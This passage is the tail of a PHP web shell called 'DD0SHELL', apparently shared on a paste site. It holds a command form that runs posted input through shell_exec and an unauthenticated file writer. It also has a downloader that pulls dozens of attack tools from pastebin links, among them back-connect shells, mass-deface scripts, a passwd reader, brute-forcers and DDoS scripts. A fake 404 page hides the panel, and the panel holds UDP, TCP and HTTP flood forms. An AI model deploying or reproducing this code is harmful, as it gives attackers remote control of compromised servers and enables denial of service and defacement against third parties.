- echo "<br /><b><font face=Verdana size=-2 color=red >[-]</font><font face=Verdana size=-2 color=silver > Nothing found on </font><font face=Verdana size=-2 color=orange ><a>[ $site$test ]</A></font><a>[$site$test]</a></font>";
- }
- }
- echo "<br><b><u><font face=Verdana size=-2 color=#513912 >Scan Finished !</font></u></b></center>";
- }
- print '<div class="layer1"><hr align="center" size="2" color="#A9A9A9" /></div>';
- }
- // ---
- function uploadshell(){
- shape();
- print '<center><form method="Post">
- <input type="text" placeholder="command" name="exe">
- <input type="submit" value="Run" name="button11"></center>';
- echo "[#] Uname: ".php_uname()."<br/>";
- if (isset($_POST['button11'])){
- $cmd = $_POST['exe'];
- echo "<pre>".shell_exec($cmd)."</pre>";
- }
- print '<div class="layer1"><hr align="center" width="1350" size="2" color="#A9A9A9" /></div>';
- echo "[#] Document_root: ".$_SERVER['DOCUMENT_ROOT']."<br/><br/>";
- echo 'Antichat'.up('http://pastebin.com/raw/MdY7Dgyw','anti.php').'<br/>';
- echo 'Xploit'.up('http://pastebin.com/raw/tU9b7BKC','Xploit.php').'<br/>';
- echo 'Adminfinder'.up('http://pastebin.com/raw/ipxDn3Ar','adminfinder.php').'<br/>';
- echo 'Bruteword'.up('http://pastebin.com/raw/veDLmYJ4','bruteword.php').'<br/>';
- echo 'noname'.up('http://pastebin.com/raw/Khq6PSWy','noname.php').'<br/>';
- echo 'Zone'.up('http://pastebin.com/raw/tiveWW1v','Zone.php').'<br/>';
- echo 'Func'.up('http://pastebin.com/raw/F2n4GHn8','func.php').'<br/>';
- echo 'Backconnect'.up('http://pastebin.com/raw/fWeEbFMH','backconnect.php').'<br/>';
- echo 'Bruteword1'.up('http://pastebin.com/raw/5TNpWMP5','bruteword1.php').'<br/>';
- echo 'dk'.up('http://pastebin.com/raw/QpwU6wPj','dk.php').'<br/>';
- echo 'Mass'.up('http://pastebin.com/raw.php?i=2unsX5e2','Mass.php').'<br/>';
- echo 'passwd'.up('http://pastebin.com/raw.php?i=KbwUY0aR','passwd.php').'<br/>';
- echo 'k2ll33d'.up('http://pastebin.com/raw.php?i=8mwwA4V2','k2ll33d.php').'<br/>';
- echo 'bot1'.up('http://pastebin.com/raw/tRAjFDAv','bot1.php').'<br/>';
- echo 'bot'.up('http://pastebin.com/raw/Fz2ZWNgF','bot.php').'<br/>';
- echo 'FTP'.up('http://pastebin.com/raw/kmPsizY0','ftp.php').'<br/>';
- echo 'Minishell'.up('http://pastebin.com/raw/cNfwjDmm','minishell.php').'<br/>';
- echo 'Sym'.up('http://pastebin.com/raw.php?i=NX74fQQU','sym.php').'<br/>';
- echo 'Mass1'.up('http://pastebin.com/raw/nsfz9BGL','Mass1.php').'<br/>';
- echo 'Users'.up('http://pastebin.com/raw.php?i=5VKD1nEk','users.php').'<br/>';
- echo 'Revslider'.up('http://pastebin.com/raw/CM0W3Jek','revslider.php').'<br/>';
- echo 'mail'.up('http://pastebin.com/raw/7pBsXL2H','mail.php').'<br/>';
- echo 'php.ini'.up('http://pastebin.com/raw.php?i=Te1e1uhA','php.ini').'<br/>';
- echo 'FOX'.up('http://pastebin.com/raw/fLqQ62Bd','fox.php').'<br/>';
- echo 'Cipher'.up('http://pastebin.com/raw/99xc9crf','cipher.php').'<br/>';
- echo 'bot2'.up('http://pastebin.com/raw/uHUyd8yc','bot2.php').'<br/>';
- echo 'Function'.up('http://pastebin.com/raw/aBN0WC14','function.php').'<br/>';
- echo 'Exploit'.up('http://pastebin.com/raw/90Beie2E','exploit.php').'<br/>';
- echo 'Mailer'.up('http://pastebin.com/raw/s30CZvvB','mailer.php').'<br/>';
- echo 'Cpanel'.up('http://pastebin.com/raw/rBjXvT0C','cpanel.php').'<br/>';
- echo 'up'.up('http://pastebin.com/raw/7Za5r5FT','up.php').'<br/>';
- echo 'Dhanush'.up('http://pastebin.com/raw/X1hQW745','Dhanush.php').'<br/>';
- echo 'Deface'.up('http://pastebin.com/raw/bRHGGFfj','deface.php').'<br/>';
- echo 'exp'.up('http://pastebin.com/raw/f6sEkprB','exp.php').'<br/>';
- echo 'Mass_shell_upload'.up('http://pastebin.com/raw/tRLpdMYx','Mass_shell_upload.php').'<br/>';
- echo 'Revol'.up('https://pastebin.com/raw/ABXVvRbP','Revol.php').'<br/>';
- echo '404'.up('http://pastebin.com/raw/fjqBQXQF','404.php').'<br/>';
- echo 'Cihshell'.up('http://pastebin.com/raw/RNWLpGZn','cihshell.php').'<br/>';
- echo "dos".up('http://pastebin.com/raw/QxR7z13U','dos.php').'<br/>';
- echo "dosSNOX".up('http://pastebin.com/raw/cUjqeMLR','dosSNOX.php').'<br/>';
- echo "gravity_shell.php".up('http://pastebin.com/raw/aCqsxs0m','gravity_shell.php').'<br/>';
- echo "up_wordpress".up('http://pastebin.com/raw/d122X3Hqbreak','upwsord').'<br/>';
- }
- function shape1(){
- echo '<title>DD0SHELL</title><body background="https://temporarytattoos.com/pub/media/catalog/product/cache/image/700x560/e9c3970ab036de70892d86c6d221abfe/h/i/hipster-fox-temporary-tattoo-6222.jpg"></body>';
- print '<!DOCTYPE html>
- <html><head><title></title></head><body><center><h1>DD0SHELL</h1></center>
- <hr align="center" width="1350" size="2" color="#A9A9A9" /><br></body></html>';
- $index = $_SERVER['DOCUMENT_ROOT'].'/index.php';
- }
- function shapeddos(){
- print "<!DOCTYPE HTML PUBLIC\"-//IETF//DTDHTML 2.0//EN\"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL ".$_SERVER['PHP_SELF']." was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>";
- }
- if(isset($_POST['f'])){ $f = fopen($_POST['name'], 'w'); fwrite($f, $_POST['f']); fclose($f); }
- function default1(){ @ob_start();
- print "<!DOCTYPE HTML PUBLIC\"-//IETF//DTDHTML 2.0//EN\"><html><head><title>404 Not Found</title></head><body link='black' vlink='black' alink='black'><h1>Not Found</h1><p>The requested URL ".$_SERVER['PHP_SELF']." was <a style='text-decoration: none;' href=".$_SERVER['PHP_SELF']."?action=root>not found</a> on this server.</p><p>Additionally, a <a style='text-decoration: none;' href=".$_SERVER['PHP_SELF']."?action=port>404</a> Not Found <a style='text-decoration: none;' href=".$_SERVER['PHP_SELF']."?action=info> error </a> was encountered <a style='text-decoration: none;' href=".$_SERVER['PHP_SELF']."?action=fox>while </a> trying to <a style='text-decoration: none;' href=".$_SERVER['PHP_SELF']."?action=incode>use</a> an ErrorDocument to handle the <a style='text-decoration: none;' href=".$_SERVER['PHP_SELF']."?action=disable>request </a>.</p></body></html>";
- die();
- exit();
- }
- function script(){
- print '<script type="text/javascript">
- function locs(){
- document.location.href="'.$_GET['address'].'";
- }
- setTimeout("locs()", 20);
- </script>';
- }
- if ($_REQUEST['action'] == "status"){print "Good";}
- switch ($_REQUEST['action']){
- case 'sql_inj':sql_inj();
- break;
- case 'disable':disable1();
- break;
- case 'root':Readfile1();
- break;
- case 'infophp':infophp();
- break;
- case 'port':scannport();
- break;
- case 'mysql':mysql1();
- break;
- case 'adminfinder':adminfinder();
- break;
- case 'uploadshell':uploadshell();
- break;
- case 'mass_deface':mass_shell();
- break;
- case 'fox':fox();
- break;
- case 'hash':hash1();
- break;
- case 'attack_http1':attack_http1();
- break;
- case 'ddosintelpost':ddosintelpost();
- break;
- case 'ddospingpanel':ddospingpanel();
- break;
- case 'doSlowpost':doSlowpost();
- break;
- case 'ftp':brute();
- break;
- case 'incode':incode();
- break;
- case 'info':info();
- break;
- case 'spam':spam();
- break;
- case 'word':word();
- break;
- case 'ddos':ddos();
- break;
- case 'ddos2':ddos2();
- break;
- case 'ddos3':ddos3();
- break;
- case 'ddos4':ddos4();
- break;
- case 'ddos5':ddos5();
- break;
- case 'doSlow':doSlow();
- break;
- case 'ddosintel':ddosintel();
- break;
- case 'attack_http':attack_http();
- break;
- case "ab":
- $url = $_POST['url'];
- $c = $_POST['c'];
- $n = $_POST['n'];
- cmdexec("ab -c $c -n $n $url");
- break;
- //Доп-функции---------------------------------------------------------------------------------------------------------------------------------------------------
- case 'IndoXploit':
- echo up('http://pastebin.com/raw/tU9b7BKC','Xploit.php');
- break;
- case 'finder':
- echo up('http://pastebin.com/raw/ipxDn3Ar','adminfinder.php');
- break;
- case 'brute':
- echo up('http://pastebin.com/raw/veDLmYJ4','bruteword.php');
- break;
- case 'noname':
- echo up('http://pastebin.com/raw/Khq6PSWy','noname.php');
- break;
- case 'Zone-h':
- echo up('http://pastebin.com/raw/tiveWW1v','Zone.php');
- break;
- case 'wso':
- echo up('http://pastebin.com/raw/F2n4GHn8','func.php');
- break;
- case 'brute1':
- echo up('http://pastebin.com/raw/5TNpWMP5','bruteword1.php');
- break;
- case 'dk':
- echo up('http://pastebin.com/raw/QpwU6wPj','dk.php');
- break;
- case "Mass-Deface":
- echo up('http://pastebin.com/raw.php?i=2unsX5e2','Mass.php');
- break;
- case "etcpasswd":
- echo up('http://pastebin.com/raw.php?i=KbwUY0aR','passwd.php');
- break;
- case "k2ll33d shell":
- echo up('http://pastebin.com/raw.php?i=8mwwA4V2','k2ll33d.php');
- break;
- case 'foreignbote':
- echo up('http://pastebin.com/raw/Fz2ZWNgF','foreignbote.php');
- break;
- case 'ftpbrute':
- echo up('http://pastebin.com/raw/kmPsizY0','ftp.php');
- break;
- case 'mini':
- echo up('http://pastebin.com/raw/cNfwjDmm','minishell.php');
- break;
- case "Symlinker":
- echo up('http://pastebin.com/raw.php?i=NX74fQQU','sym.php');
- break;
- case "server users":
- echo up('http://pastebin.com/raw.php?i=5VKD1nEk','users.php');
- break;
- case 'revslider':
- echo up('http://pastebin.com/raw/CM0W3Jek','revslider.php');
- break;
- case 'mail':
- echo up('http://pastebin.com/raw/7pBsXL2H','mail.php');
- break;
- case "safe mode":
- echo up('http://pastebin.com/raw.php?i=Te1e1uhA','php.ini');
- break;
- case 'spamfox':
- echo up('http://pastebin.com/raw/fLqQ62Bd','fox.php');
- break;
- case 'cipher':
- echo up('http://pastebin.com/raw/99xc9crf','cipher.php');
- break;
- case 'bot':
- echo up('http://pastebin.com/raw/uHUyd8yc','bot.php');
- break;
- case 'dosbot':
- echo up('http://pastebin.com/raw/aBN0WC14','function.php');
- break;
- case 'exploit':
- echo up('http://pastebin.com/raw/90Beie2E','exploit.php');
- break;
- case 'cpanel':
- echo up('http://pastebin.com/raw/rBjXvT0C','cpanel.php');
- break;
- case 'up':
- echo up('http://pastebin.com/raw/7Za5r5FT','up.php');
- break;
- case 'Dhanush':
- echo up('http://pastebin.com/raw/X1hQW745','Dhanush.php');
- break;
- case 'Deface':
- echo up('http://pastebin.com/raw/bRHGGFfj','deface.php');
- break;
- case 'Massup':
- echo up('http://pastebin.com/raw/tRLpdMYx','Mass_shell_upload.php');
- break;
- case '404':
- echo up('http://pastebin.com/raw/fjqBQXQF','404.php');
- break;
- case 'cihshell':
- echo up('http://pastebin.com/raw/RNWLpGZn','cihshell.php');
- break;
- case 'c99':
- echo up('http://pastebin.com/raw/q9H31DKU','c99.php');
- break;
- case 'dos':
- echo up('http://pastebin.com/raw/QxR7z13U','dos.php');
- break;
- case 'dosSNOX':
- echo up('http://pastebin.com/raw/cUjqeMLR','dosSNOX.php');
- break;
- case 'gravity_shell':
- echo up('http://pastebin.com/raw/aCqsxs0m','gravity_shell.php');
- break;
- case 'a.out':
- echo up('http://pastebin.com/raw/Z9dTVpLp','a.out');
- break;
- case 'log':
- echo up('http://pastebin.com/raw/FiDy6d4F','whitecat.c');
- break;
- case 'up_wordpress':
- echo up('http://pastebin.com/raw/d122X3Hqbreak','upwsord.php');
- break;
- case 'ddospost':
- echo up('http://pastebin.com/raw/9XL4dpCz','func.php');
- break;
- case 'doshell':
- echo up('http://pastebin.com/raw/yR5mDkAs','adm.php');
- break;
- default:default1();
- break;
- }
- function up($input,$output){
- @mkdir('tools');
- @chdir('./tools');
- if(!file_exists($output)){
- $m = @file_get_contents($input);
- $save = fopen("$output", "w"); fwrite($save, $m); fclose($save);
- return "<br>[#]DoNe: <a href=\"./tools/$output\"> Go to Here </a><br/>";
- }else{ return "<br>[#] Allready Here : <a href=\"./tools/$output\"> Go to Here </a><br/>"; }
- }
- function but(){
- print '<html>
- <head>
- <title>example</title>
- <style type="text/css">
- textarea { width: 500px; height: 250px; border: 1px solid #000000; margin: 5px auto; padding: 7px; }
- input[class="b1"] { width: 250px; height: 25px; border: 1px solid #000000; background: transparent; margin: 8px auto; float: left; margin-left: 20.5%;}
- </style>
- </head>
- <body>
- <center>
- <div id="123111" title="slowread">
- <form method="post">
- <input type="text" name="ipslow" placeholder="ip">
- <input type="text" name="time" placeholder="time">
- <input type="submit" value="attack" name="go2">
- </form>
- </div>
- <div><input type="button" value="slowread" class="b1"></div>
- <script src="http://code.jquery.com/jquery-1.10.2.js"></script>
- <script src="http://code.jquery.com/ui/1.11.0/jquery-ui.js"></script>
- <link rel="stylesheet" href="http://code.jquery.com/ui/1.11.0/themes/smoothness/jquery-ui.css">
- <script>
- var dialog = $("#123111").dialog({autoOpen: false});
- $("input[value=slowread]").click(function ()
- {
- dialog.dialog( "open" );
- });
- </script>
- <div id="dialo" title="udpflood">
- <form method="post">
- <input type="text" name="ip1" placeholder="ip">
- <input type="text" name="time1" placeholder="time">
- <input type="submit" value="attack" name="go">
- </form>
- </div>
- <div><input type="button" value="udpflood" class="b1"></div>
- <script src="http://code.jquery.com/jquery-1.10.2.js"></script>
- <script src="http://code.jquery.com/ui/1.11.0/jquery-ui.js"></script>
- <link rel="stylesheet" href="http://code.jquery.com/ui/1.11.0/themes/smoothness/jquery-ui.css">
- <script>
- var dialo = $("#dialo").dialog({autoOpen: false});
- $("input[value=udpflood]").click(function ()
- {
- dialo.dialog( "open" );
- });
- </script>
- <div id="122234" title="doSlow">
- <form method="post">
- <input type="text" name="dohost" placeholder="ip">
- <input type="text" name="time" placeholder="time">
- <input type="submit" value="attack" name="go3">
- </form>
- </div>
- <div><input type="button" value="doSlow" class="b1"></div>
- <script src="http://code.jquery.com/jquery-1.10.2.js"></script>
- <script src="http://code.jquery.com/ui/1.11.0/jquery-ui.js"></script>
- <link rel="stylesheet" href="http://code.jquery.com/ui/1.11.0/themes/smoothness/jquery-ui.css">
- <script>
- var dial = $("#122234").dialog({autoOpen: false});
- $("input[value=doSlow]").click(function ()
- {
- dial.dialog( "open" );
- });
- </script>
- <div id="12345" title="postflood">
- <form method="post">
- <input type="text" name="server1" placeholder="ip">
- <input type="text" name="host1" placeholder="host">
- <input type="submit" value="attack" name="go3">
- </form>
- </div>
- <div><input type="button" value="postflood" class="b1"></div>
- <script src="http://code.jquery.com/jquery-1.10.2.js"></script>
- <script src="http://code.jquery.com/ui/1.11.0/jquery-ui.js"></script>
- <link rel="stylesheet" href="http://code.jquery.com/ui/1.11.0/themes/smoothness/jquery-ui.css">
- <script>
- var dia = $("#12345").dialog({autoOpen: false});
- $("input[value=postflood]").click(function ()
- {
- dia.dialog( "open" );
- });
- </script>
- <div id="123456" title="ddosintel">
- <form method="post">
- <input type="text" name="ip" placeholder="ip">
- <input type="submit" value="attack" name="go3">
- </form>
- </div>
- <div><input type="button" value="ddosintel" class="b1"></div>
- <script src="http://code.jquery.com/jquery-1.10.2.js"></script>
- <script src="http://code.jquery.com/ui/1.11.0/jquery-ui.js"></script>
- <link rel="stylesheet" href="http://code.jquery.com/ui/1.11.0/themes/smoothness/jquery-ui.css">
- <script>
- var di = $("#123456").dialog({autoOpen: false});
- $("input[value=ddosintel]").click(function ()
- {
- di.dialog( "open" );
- });
- </script>
- <div id="1234567" title="tcpflood">
- <form method="POST">
- <input type="text" name="ip2" placeholder="ip">
- <input type="text" name="time2" placeholder="time">
- <input type="submit" value="attack" name="go9">
- </form>
- </div>
- <div><input type="button" value="tcpflood" class="b1"></div>
- <script src="http://code.jquery.com/jquery-1.10.2.js"></script>
- <script src="http://code.jquery.com/ui/1.11.0/jquery-ui.js"></script>
- <link rel="stylesheet" href="http://code.jquery.com/ui/1.11.0/themes/smoothness/jquery-ui.css">
- <script>
- var d = $("#1234567").dialog({autoOpen: false});
- $("input[value=tcpflood]").click(function ()
- {
- d.dialog( "open" );
- });
- </script>
- <div id="12345678" title="attack_http">
- <form method="post">
- <input type="text" name="mhtd" placeholder="mhtd">
- <input type="text" name="host" placeholder="host">
- <input type="text" name="server" placeholder="server">
- <input type="submit" value="attack" name="go3">
- </form>
- </div>
- <div><input type="button" value="attack_http" class="b1"></div>
- <script src="http://code.jquery.com/jquery-1.10.2.js"></script>
- <script src="http://code.jquery.com/ui/1.11.0/jquery-ui.js"></script>
- <link rel="stylesheet" href="http://code.jquery.com/ui/1.11.0/themes/smoothness/jquery-ui.css">
- <script>
- var b = $("#12345678").dialog({autoOpen: false});
- $("input[value=attack_http]").click(function ()
- {
- b.dialog( "open" );
- });
- </script>
- <div id="123456789" title="tcpconnect">
- <form method="post">
- <input type="text" name="tcpcon" placeholder="ip">
- <input type="text" name="port" placeholder="port">
- <input type="text" name="time" placeholder="time">
- <input type="submit" value="attack" name="go3">
- </form>
- </div>
- <div><input type="button" value="tcpconnect" class="b1"></div>
- <script src="http://code.jquery.com/jquery-1.10.2.js"></script>
- <script src="http://code.jquery.com/ui/1.11.0/jquery-ui.js"></script>
- <link rel="stylesheet" href="http://code.jquery.com/ui/1.11.0/themes/smoothness/jquery-ui.css">
- <script>
- var f = $("#123456789").dialog({autoOpen: false});
- $("input[value=tcpconnect]").click(function ()
- {
- f.dialog( "open" );
- });
- </script>
- </center>
- </body>
- </html>';
- }
- ?>
Add Comment
Please, Sign In to add comment